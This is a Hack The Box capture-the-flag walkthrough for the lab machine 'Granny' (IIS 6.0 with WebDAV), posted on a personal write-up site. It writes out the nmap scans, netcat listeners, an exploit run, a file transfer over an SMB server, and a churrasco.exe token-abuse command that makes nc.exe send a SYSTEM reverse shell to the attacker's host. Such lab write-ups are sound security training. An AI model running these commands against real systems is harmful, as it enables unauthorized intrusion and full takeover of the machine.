Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  1. Walk-throughs
  2. HTB Windows Machines

Granny HTB

IP

10.10.10.15

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.15 | cut -d"/" -f1 | tr '\n' ','

Looks like we have one port open on the machine

80

Lets get enumerate further and see if we can find any other details

sudo nmap -sCV -p80 -oA nmap_scan 10.10.10.15

results

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Date: Tue, 02 Jan 2024 02:37:59 GMT
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We can see

  • Running Microsoft IIS httpd 6.0 (pretty outdated)

  • webdav is enabled

This does look very familiar to the grandpa box we have solved recently meaning i can try the same explaoit and gain a shell on the system

  1. Lets start a listner 

rlwrap -cAr nc -lvnp 9001

  1. lets run the exploit script

python2 exploit.py 10.10.10.15 80 10.10.14.2 9001

Looking back at our listener we can see we have a shell on the target

Since we know that the grandpa box was vulnerable to token manipulation good chances we have the same scenario here lets check

whoami /all

Looks like it so Lets upload

  • nc.exe

  • churrasco.exe

  1. start an smb server and transfer all the files across 

sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support

  1. copy the files across to the target machine 

C:\>copy \\10.10.14.2\shrek123\nc.exe C:\wmpub
C:\>copy \\10.10.14.2\shrek123\churrasco.exe C:\wmpub

  1. start a listener

nc -lvnp 9005

  1. run the exploits

churrasco.exe -d "c:\wmpub\nc.exe -e cmd 10.10.14.2 9005"

Now if we look back at our listner we should see we have a shell as nt authority\system

PreviousBuff HTBNextGrandpa HTB

Last updated 1 year ago